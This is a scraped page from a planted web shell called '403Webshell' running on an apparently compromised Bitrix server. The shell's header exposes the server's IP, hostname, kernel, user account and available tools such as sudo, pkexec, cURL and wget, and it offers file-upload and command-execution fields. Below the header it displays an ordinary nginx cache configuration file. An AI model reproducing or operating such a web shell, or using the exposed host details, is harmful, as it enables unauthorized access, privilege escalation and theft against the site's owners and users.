403Webshell
Server IP : 80.87.202.40  /  Your IP : 216.73.216.169
Web Server : Apache
System : Linux rospirotorg.ru 5.14.0-539.el9.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Dec 5 22:26:13 UTC 2024 x86_64
User : bitrix ( 600)
PHP Version : 8.2.27
Disable Function : NONE
MySQL : OFF |  cURL : ON |  WGET : ON |  Perl : ON |  Python : OFF |  Sudo : ON |  Pkexec : ON
Directory :  /var/lib/letsencrypt/backups/1746626467.6231751/

Upload File :
current_dir [ Writeable] document_root [ Writeable]

 

Command :


[ Back ]     

Current File : /var/lib/letsencrypt/backups/1746626467.6231751/bitrix.conf_19
# cache condition variable
set $usecache "";
if ($is_global_cache = 1) {
    set $usecache "${usecache}A";
}

# main config without processing cache pages
include bx/conf/bitrix_general.conf;

# php file processing
location ~ \.php$ {
    set $cache_file "bitrix/html_pages$general_key@$args.html";
    # test file conditions
    if (-f "$docroot/bitrix/html_pages/.enabled") {
	set $usecache "${usecache}B";
    }
    if (-f "$docroot/$cache_file") {
	set $usecache "${usecache}C";
    }
    # create rewrite if cache-file exists
    if ($usecache = "ABC" ) {
	rewrite .* /$cache_file last;
    }
    proxy_pass $proxyserver;
}

# directories page processing
location ~ /$ {
    set $cache_file "bitrix/html_pages$general_key/index@$args.html";
    # test file conditions
    if (-f "$docroot/bitrix/html_pages/.enabled") {
	set $usecache "${usecache}B";
    }
    if (-f "$docroot/$cache_file") {
	set $usecache "${usecache}C";
    }
    # create rewrite if cache-file exists
    if ($usecache = "ABC" ) {
	rewrite .* /$cache_file last;
    }
    proxy_pass $proxyserver;
}

# Main location
location / {
    proxy_pass $proxyserver;
}


Youez - 2016 - github.com/yon3zu
LinuXploit